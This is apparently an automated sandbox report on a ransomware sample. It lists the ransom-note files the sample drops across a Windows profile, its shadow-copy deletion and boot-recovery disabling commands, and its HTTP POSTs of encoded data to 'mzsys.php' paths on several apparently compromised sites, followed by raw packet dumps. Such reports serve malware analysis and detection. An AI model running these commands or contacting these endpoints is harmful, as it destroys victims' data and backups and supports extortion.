Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Security\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\Install\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Templates\excel4.xls
Creates FileC:\Documents and Settings\Administrator\Templates\wordpfct.wpd
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\Content\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\MetaData\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013061320130614\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Entertainment\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Preferences\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\My Documents\My Music\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Cookies\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\Install\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\IMJP8_1\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\Search70\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\appcompat.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\My Documents\My Music\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\Certificates\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\My Documents\My Pictures\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Sunset.jpg
Creates FileC:\Documents and Settings\Administrator\Application Data\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Templates\excel.xls
Creates FileC:\Documents and Settings\Administrator\Templates\powerpnt.ppt
Creates FileC:\Documents and Settings\Administrator\Application Data\AdobeUM\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Collab\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\PrintHood\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CTLs\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Cookies\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\All Users\DRM\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\SendTo\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\dd_netfx20MSI3716.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\9.0\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\JavaScripts\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Templates\quattro.wb2
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Security\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\0019E545\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Music\Beethoven's Symphony No. 9 (Scherzo).wma
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_10.0.30319\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CRLs\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\MMC\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\HELP_RECOVER_instructions+hec.html
Creates FilePIPE\srvsvc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\0019E545\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\My Documents\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Recent\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_10.0.30319\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\NetHood\shared on Samba 3.6.9-151.el6 (192.168.1.1)\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\All Users\Documents\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Music\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013052720130603\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\My Documents\My Pictures\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Forms\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Templates\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Accessibility\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013052720130603\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013061320130614\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\HELP_RECOVER_instructions+hec.txt
Creates Processvssadmin.exe delete shadows /all /Quiet
Creates Processbcdedit.exe /set {current} recoveryenabled off
Creates Mutex__sys_234238233295

Process
↳ bcdedit.exe /set {current} recoveryenabled off

Process
↳ vssadmin.exe delete shadows /all /Quiet

Creates FilePIPE\lsarpc

Network Details:

DNShnb.net
Type: A
222.165.133.242
DNSfirecheerleaders.fr
Type: A
213.186.33.171
DNSladiesdehaan.be
Type: A
62.210.92.9
DNSchonburicoop.net
Type: A
27.254.96.151
DNSpasslift.com
Type: A
217.116.196.239
DNSactionpourisrael.com
Type: A
213.186.33.4
HTTP POSThttp://hnb.net/templates/assets/email_tmpl/uploads/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
HTTP POSThttp://firecheerleaders.fr/modules/mod_cmscore/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
HTTP POSThttp://ladiesdehaan.be/modules/mod_cmscore/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
HTTP POSThttp://chonburicoop.net/tmp/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
HTTP POSThttp://passlift.com/templates/sj_icenter/html/mod_k2_content/Default/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
HTTP POSThttp://actionpourisrael.com/modules/mod_speedup/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
Flows TCP192.168.1.1:1031 ➝ 222.165.133.242:80
Flows TCP192.168.1.1:1032 ➝ 213.186.33.171:80
Flows TCP192.168.1.1:1033 ➝ 62.210.92.9:80
Flows TCP192.168.1.1:1034 ➝ 27.254.96.151:80
Flows TCP192.168.1.1:1035 ➝ 217.116.196.239:80
Flows TCP192.168.1.1:1036 ➝ 213.186.33.4:80

Raw Pcap
0x00000000 (00000)   504f5354 202f7465 6d706c61 7465732f   POST /templates/
0x00000010 (00016)   61737365 74732f65 6d61696c 5f746d70   assets/email_tmp
0x00000020 (00032)   6c2f7570 6c6f6164 732f6d7a 7379732e   l/uploads/mzsys.
0x00000030 (00048)   70687020 48545450 2f312e31 0d0a4163   php HTTP/1.1..Ac
0x00000040 (00064)   63657074 3a202ced 04d0432c 202c202c   cept: ,...C, , ,
0x00000050 (00080)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000060 (00096)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000070 (00112)   202c202c 202c202c 200d0a43 6f6e7465    , , , , ..Conte
0x00000080 (00128)   6e742d54 7970653a 20617070 6c696361   nt-Type: applica
0x00000090 (00144)   74696f6e 2f782d77 77772d66 6f726d2d   tion/x-www-form-
0x000000a0 (00160)   75726c65 6e636f64 65640d0a 55736572   urlencoded..User
0x000000b0 (00176)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x000000c0 (00192)   352e3020 2857696e 646f7773 204e5420   5.0 (Windows NT 
0x000000d0 (00208)   362e333b 20574f57 36343b20 54726964   6.3; WOW64; Trid
0x000000e0 (00224)   656e742f 372e303b 20546f75 63683b20   ent/7.0; Touch; 
0x000000f0 (00240)   72763a31 312e3029 206c696b 65204765   rv:11.0) like Ge
0x00000100 (00256)   636b6f0d 0a486f73 743a2068 6e622e6e   cko..Host: hnb.n
0x00000110 (00272)   65740d0a 436f6e74 656e742d 4c656e67   et..Content-Leng
0x00000120 (00288)   74683a20 3634350d 0a436163 68652d43   th: 645..Cache-C
0x00000130 (00304)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000140 (00320)   0d0a0d0a 64617461 3d444639 36384345   ....data=DF968CE
0x00000150 (00336)   36384234 37443645 31313536 32334636   68B47D6E115623F6
0x00000160 (00352)   46463241 31453742 32444432 44413630   FF2A1E7B2DD2DA60
0x00000170 (00368)   31373145 41423445 46334635 42414431   171EAB4EF3F5BAD1
0x00000180 (00384)   41373532 46453237 30373936 36363745   A752FE270796667E
0x00000190 (00400)   36434330 30423844 37463441 31433142   6CC00B8D7F4A1C1B
0x000001a0 (00416)   32323230 43323337 35333232 33364637   2220C237532236F7
0x000001b0 (00432)   39433345 44453333 39464531 44393535   9C3EDE339FE1D955
0x000001c0 (00448)   34353338 41314638 37343730 36354444   4538A1F8747065DD
0x000001d0 (00464)   37353730 35353046 33303636 30363633   7570550F30660663
0x000001e0 (00480)   35433645 33453235 31413232 45313133   5C6E3E251A22E113
0x000001f0 (00496)   38423532 37423730 44363635 45414236   8B527B70D665EAB6
0x00000200 (00512)   31464232 36314545 34323035 39364632   1FB261EE420596F2
0x00000210 (00528)   36384639 36434346 43333932 32313932   68F96CCFC3922192
0x00000220 (00544)   32353830 43323845 36354343 35304331   2580C28E65CC50C1
0x00000230 (00560)   30343036 35443430 42344542 33343533   04065D40B4EB3453
0x00000240 (00576)   45363644 43413045 42354243 30413942   E66DCA0EB5BC0A9B
0x00000250 (00592)   35364432 43423343 36413132 38304632   56D2CB3C6A1280F2
0x00000260 (00608)   42373945 33373943 32433336 43303646   B79E379C2C36C06F
0x00000270 (00624)   36423739 32313233 42333330 30363730   6B792123B3300670
0x00000280 (00640)   35343737 30343335 32444639 32334343   547704352DF923CC
0x00000290 (00656)   35334336 39454143 31393541 38394645   53C69EAC195A89FE
0x000002a0 (00672)   41453130 38353545 45453830 46413045   AE10855EEE80FA0E
0x000002b0 (00688)   30454145 36423639 36433745 31443235   0EAE6B696C7E1D25
0x000002c0 (00704)   37363346 43424138 35303643 35343235   763FCBA8506C5425
0x000002d0 (00720)   38374130 42423443 37443141 32343746   87A0BB4C7D1A247F
0x000002e0 (00736)   35323233 43463133 41434144 30433641   5223CF13ACAD0C6A
0x000002f0 (00752)   37413442 34324134 30424132 39453433   7A4B42A40BA29E43
0x00000300 (00768)   33443335 31384642 39463146 42453546   3D3518FB9F1FBE5F
0x00000310 (00784)   31443244 33324346 34453146 45463136   1D2D32CF4E1FEF16
0x00000320 (00800)   36454639 44434144 30383045 46463945   6EF9DCAD080EFF9E
0x00000330 (00816)   33433939 43393833 45363337 33323239   3C99C983E6373229
0x00000340 (00832)   42424333 34314338 33323044 45424331   BBC341C8320DEBC1
0x00000350 (00848)   30353536 35323730 35384430 30393442   0556527058D0094B
0x00000360 (00864)   42434443 38334145 37343236 37324642   BCDC83AE742672FB
0x00000370 (00880)   46363731 46424138 39323145 35413236   F671FBA8921E5A26
0x00000380 (00896)   32373942 36383635 34313235 36413235   279B686541256A25
0x00000390 (00912)   46353136 37384542 35444434 46373335   F51678EB5DD4F735
0x000003a0 (00928)   45433537 33383736 30343839 43463839   EC5738760489CF89
0x000003b0 (00944)   34433232 30413036 44414543 35374131   4C220A06DAEC57A1
0x000003c0 (00960)   44383837 32353330 38                  D88725308

0x00000000 (00000)   504f5354 202f6d6f 64756c65 732f6d6f   POST /modules/mo
0x00000010 (00016)   645f636d 73636f72 652f6d7a 7379732e   d_cmscore/mzsys.
0x00000020 (00032)   70687020 48545450 2f312e31 0d0a4163   php HTTP/1.1..Ac
0x00000030 (00048)   63657074 3a202ced 04d0432c 202c202c   cept: ,...C, , ,
0x00000040 (00064)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000050 (00080)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000060 (00096)   202c202c 202c202c 200d0a43 6f6e7465    , , , , ..Conte
0x00000070 (00112)   6e742d54 7970653a 20617070 6c696361   nt-Type: applica
0x00000080 (00128)   74696f6e 2f782d77 77772d66 6f726d2d   tion/x-www-form-
0x00000090 (00144)   75726c65 6e636f64 65640d0a 55736572   urlencoded..User
0x000000a0 (00160)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x000000b0 (00176)   352e3020 2857696e 646f7773 204e5420   5.0 (Windows NT 
0x000000c0 (00192)   362e333b 20574f57 36343b20 54726964   6.3; WOW64; Trid
0x000000d0 (00208)   656e742f 372e303b 20546f75 63683b20   ent/7.0; Touch; 
0x000000e0 (00224)   72763a31 312e3029 206c696b 65204765   rv:11.0) like Ge
0x000000f0 (00240)   636b6f0d 0a486f73 743a2066 69726563   cko..Host: firec
0x00000100 (00256)   68656572 6c656164 6572732e 66720d0a   heerleaders.fr..
0x00000110 (00272)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000120 (00288)   3634350d 0a436163 68652d43 6f6e7472   645..Cache-Contr
0x00000130 (00304)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x00000140 (00320)   64617461 3d444639 36384345 36384234   data=DF968CE68B4
0x00000150 (00336)   37443645 31313536 32334636 46463241   7D6E115623F6FF2A
0x00000160 (00352)   31453742 32444432 44413630 31373145   1E7B2DD2DA60171E
0x00000170 (00368)   41423445 46334635 42414431 41373532   AB4EF3F5BAD1A752
0x00000180 (00384)   46453237 30373936 36363745 36434330   FE270796667E6CC0
0x00000190 (00400)   30423844 37463441 31433142 32323230   0B8D7F4A1C1B2220
0x000001a0 (00416)   43323337 35333232 33364637 39433345   C237532236F79C3E
0x000001b0 (00432)   44453333 39464531 44393535 34353338   DE339FE1D9554538
0x000001c0 (00448)   41314638 37343730 36354444 37353730   A1F8747065DD7570
0x000001d0 (00464)   35353046 33303636 30363633 35433645   550F306606635C6E
0x000001e0 (00480)   33453235 31413232 45313133 38423532   3E251A22E1138B52
0x000001f0 (00496)   37423730 44363635 45414236 31464232   7B70D665EAB61FB2
0x00000200 (00512)   36314545 34323035 39364632 36384639   61EE420596F268F9
0x00000210 (00528)   36434346 43333932 32313932 32353830   6CCFC39221922580
0x00000220 (00544)   43323845 36354343 35304331 30343036   C28E65CC50C10406
0x00000230 (00560)   35443430 42344542 33343533 45363644   5D40B4EB3453E66D
0x00000240 (00576)   43413045 42354243 30413942 35364432   CA0EB5BC0A9B56D2
0x00000250 (00592)   43423343 36413132 38304632 42373945   CB3C6A1280F2B79E
0x00000260 (00608)   33373943 32433336 43303646 36423739   379C2C36C06F6B79
0x00000270 (00624)   32313233 42333330 30363730 35343737   2123B33006705477
0x00000280 (00640)   30343335 32444639 32334343 35334336   04352DF923CC53C6
0x00000290 (00656)   39454143 31393541 38394645 41453130   9EAC195A89FEAE10
0x000002a0 (00672)   38353545 45453830 46413045 30454145   855EEE80FA0E0EAE
0x000002b0 (00688)   36423639 36433745 31443235 37363346   6B696C7E1D25763F
0x000002c0 (00704)   43424138 35303643 35343235 38374130   CBA8506C542587A0
0x000002d0 (00720)   42423443 37443141 32343746 35323233   BB4C7D1A247F5223
0x000002e0 (00736)   43463133 41434144 30433641 37413442   CF13ACAD0C6A7A4B
0x000002f0 (00752)   34324134 30424132 39453433 33443335   42A40BA29E433D35
0x00000300 (00768)   31384642 39463146 42453546 31443244   18FB9F1FBE5F1D2D
0x00000310 (00784)   33324346 34453146 45463136 36454639   32CF4E1FEF166EF9
0x00000320 (00800)   44434144 30383045 46463945 33433939   DCAD080EFF9E3C99
0x00000330 (00816)   43393833 45363337 33323239 42424333   C983E6373229BBC3
0x00000340 (00832)   34314338 33323044 45424331 30353536   41C8320DEBC10556
0x00000350 (00848)   35323730 35384430 30393442 42434443   527058D0094BBCDC
0x00000360 (00864)   38334145 37343236 37324642 46363731   83AE742672FBF671
0x00000370 (00880)   46424138 39323145 35413236 32373942   FBA8921E5A26279B
0x00000380 (00896)   36383635 34313235 36413235 46353136   686541256A25F516
0x00000390 (00912)   37384542 35444434 46373335 45433537   78EB5DD4F735EC57
0x000003a0 (00928)   33383736 30343839 43463839 34433232   38760489CF894C22
0x000003b0 (00944)   30413036 44414543 35374131 44383837   0A06DAEC57A1D887
0x000003c0 (00960)   32353330 38                           25308

0x00000000 (00000)   504f5354 202f6d6f 64756c65 732f6d6f   POST /modules/mo
0x00000010 (00016)   645f636d 73636f72 652f6d7a 7379732e   d_cmscore/mzsys.
0x00000020 (00032)   70687020 48545450 2f312e31 0d0a4163   php HTTP/1.1..Ac
0x00000030 (00048)   63657074 3a202ced 04d0432c 202c202c   cept: ,...C, , ,
0x00000040 (00064)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000050 (00080)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000060 (00096)   202c202c 202c202c 200d0a43 6f6e7465    , , , , ..Conte
0x00000070 (00112)   6e742d54 7970653a 20617070 6c696361   nt-Type: applica
0x00000080 (00128)   74696f6e 2f782d77 77772d66 6f726d2d   tion/x-www-form-
0x00000090 (00144)   75726c65 6e636f64 65640d0a 55736572   urlencoded..User
0x000000a0 (00160)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x000000b0 (00176)   352e3020 2857696e 646f7773 204e5420   5.0 (Windows NT 
0x000000c0 (00192)   362e333b 20574f57 36343b20 54726964   6.3; WOW64; Trid
0x000000d0 (00208)   656e742f 372e303b 20546f75 63683b20   ent/7.0; Touch; 
0x000000e0 (00224)   72763a31 312e3029 206c696b 65204765   rv:11.0) like Ge
0x000000f0 (00240)   636b6f0d 0a486f73 743a206c 61646965   cko..Host: ladie
0x00000100 (00256)   73646568 61616e2e 62650d0a 436f6e74   sdehaan.be..Cont
0x00000110 (00272)   656e742d 4c656e67 74683a20 3634350d   ent-Length: 645.
0x00000120 (00288)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000130 (00304)   6e6f2d63 61636865 0d0a0d0a 64617461   no-cache....data
0x00000140 (00320)   3d444639 36384345 36384234 37443645   =DF968CE68B47D6E
0x00000150 (00336)   31313536 32334636 46463241 31453742   115623F6FF2A1E7B
0x00000160 (00352)   32444432 44413630 31373145 41423445   2DD2DA60171EAB4E
0x00000170 (00368)   46334635 42414431 41373532 46453237   F3F5BAD1A752FE27
0x00000180 (00384)   30373936 36363745 36434330 30423844   0796667E6CC00B8D
0x00000190 (00400)   37463441 31433142 32323230 43323337   7F4A1C1B2220C237
0x000001a0 (00416)   35333232 33364637 39433345 44453333   532236F79C3EDE33
0x000001b0 (00432)   39464531 44393535 34353338 41314638   9FE1D9554538A1F8
0x000001c0 (00448)   37343730 36354444 37353730 35353046   747065DD7570550F
0x000001d0 (00464)   33303636 30363633 35433645 33453235   306606635C6E3E25
0x000001e0 (00480)   31413232 45313133 38423532 37423730   1A22E1138B527B70
0x000001f0 (00496)   44363635 45414236 31464232 36314545   D665EAB61FB261EE
0x00000200 (00512)   34323035 39364632 36384639 36434346   420596F268F96CCF
0x00000210 (00528)   43333932 32313932 32353830 43323845   C39221922580C28E
0x00000220 (00544)   36354343 35304331 30343036 35443430   65CC50C104065D40
